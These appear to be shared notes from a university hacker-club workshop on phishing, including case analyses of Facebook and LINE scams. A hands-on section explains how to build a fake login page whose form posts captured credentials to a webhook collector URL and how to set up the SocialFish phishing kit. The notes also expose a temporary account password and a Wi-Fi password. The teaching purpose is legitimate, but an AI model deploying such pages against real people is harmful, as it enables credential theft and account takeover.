--- title: 今晚釣到哪隻大魚-論社交攻擊原理與實際案例探討 tags: 活動共筆, 109上 description: 20201214 --- # 今晚釣到哪隻大魚-論社交攻擊原理與實際案例探討 :::success 歡迎大家多填寫共筆!登入 hackmd 後即可填寫。 - [共筆網址](https://hackmd.io/@HackerSir/FeiFei-1214_note) - [匿名聊天室slido](https://app.sli.do/event/znjbmovl/live/questions) - [活動回饋表單](https://forms.gle/jTdqh37SkaCundAw5) ::: :::danger ## 場地使用須知 一般事項 1. 請勿任意將場地內物品帶走 2. 請自行保管個人物品,本單位不負保管責任 ::: ---- # 今日時程表 |時間|項目|備註| |:--:|:--:|:--:| |18:00 - 18:50| 場佈|| 18:50 - 19:00| 簽到|| 19:00 - 19:50| 講師授課|分析 Facebook 釣魚網站分析與手法| 19:50 - 20:00| 休息時間|| 20:00 - 20:50| 講師授課|如何製作釣魚信件與網站| 20:50 - 21:00| 頒獎及頒發感謝狀|| ---- ## 駭客的攻擊手法資料庫 https://attack.mitre.org/ ## ATT&CK 模型 - pre-Attack - Attack for Enterprise - 與釣魚有關的 - T1598 - T1566 Phishing ## 變臉詐騙 / BEC(Business Email Compromise) - 偽造信件(供應商詐騙) - 偽裝成主管 - 駭客直接入侵員工信箱,以員工身份攻擊 ## 社交工程事件分析 - Case 1 : Facebook - 收到釣魚連結 - 點進去來到奇怪的登入畫面 - 簡體中文 - 非 Facebook 網址 - 輸入自己的帳號密碼,然後被盜幫 QQ - 看一下網頁 - 使用 form 相關語法 (表單) - 發現駭客用 POST 把資料傳送到駭客伺服器 - 透過 token 進行識別化 - 嘗試送假資料來攔截封包 - 結果跳轉到廣告頁面 - 按取消就會跳到更多的釣魚網頁... - 然後一直跳一直跳... - 訪問被盜的人 - 沒意識到有沒有輸入,想說是認識的人就點 - Case 2 : LINE - 假星巴克網址 - 填問卷 - 按 LINE 分享給更多的人 - 嘗試分析 JavaScript - 最後還導向權限很大的惡意 App - 點完下載還會跟 Case 1 一樣一直跳到其它問卷 - Case 3 : 惡意郵件 - 透過勒索的口語來威脅你 - 但簡體字似乎對台灣人沒用... - 中間人攻擊 - 透過從中攔截的方式來竊取資料 - 攔截封包亦是 ## 實作時間 - 註冊 GitHub - 按照下方圖片步驟建立專案 - 開啟 webhook.site 獲取 unique URL ![](https://i.imgur.com/GqRO5at.png) - 複製下方網址之範例程式碼,並將其中兩處的"請把你的 Your unique URL 放在這裡"改為您的unique URL - 第36行 ```html <form class="form-group" action="請把你的 Your unique URL 放在這裡" method="post" enctype="multipart/form-data"> ``` - 第102行 ```html <img src="請把你的 Your unique URL 放在這裡/?uid=1" style="display:none" alt=""> ``` - console.log("Hello world") - print("Hello world") - docker run hello-world - echo "Helloworld"; - cout << "Hello world" << endl ; - printf("Hello world\n"); - fmt.Printf("Hello world") https://webhook.site/ :::info **釣魚網站範例程式碼** https://raw.githubusercontent.com/fcu-d0449763/phishing_20201214/98aad8ae1df52cbac62d132650bfad94a76528b7/index.html **Webhook Site 網址** https://webhook.site/ ::: :::danger **暫用 Github 帳密** fua59843@zwoho.com 54dYYv5s ::: :::success **飛飛大大的歪發伊密碼** FEI WIF 20190828 ::: ![](https://i.imgur.com/uBifWA2.png) ![](https://i.imgur.com/mVwTDvi.png) ![](https://i.imgur.com/1pbv0Bt.png) ![](https://i.imgur.com/kZKnUwH.png) ![](https://i.imgur.com/f4WF0f4.png) ![](https://i.imgur.com/N7X8JxB.png) ![](https://i.imgur.com/3CMLhNX.png) ![](https://i.imgur.com/pTGgrd0.png) ![](https://i.imgur.com/UhpaK20.png) ![](https://i.imgur.com/3rXzCU3.png) ![](https://i.imgur.com/1e4txg7.png) ![](https://i.imgur.com/oPqfXvs.png) ![](https://i.imgur.com/fxwwl4h.png) ![](https://i.imgur.com/oYLCAAK.png) ![](https://i.imgur.com/vXW2erA.png) ![](https://i.imgur.com/upK3K2j.png) ![](https://i.imgur.com/0SMMm7M.png) ```cmd git clone https://github.com/UndeadSec/SocialFish.git sudo apt-get install python3 python3-pip python3-dev -y cd SocialFish python3 -m pip install -r requirements.txt python3 SocialFish.py youruser yourpassword ``` https://phishingquiz.withgoogle.com/
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up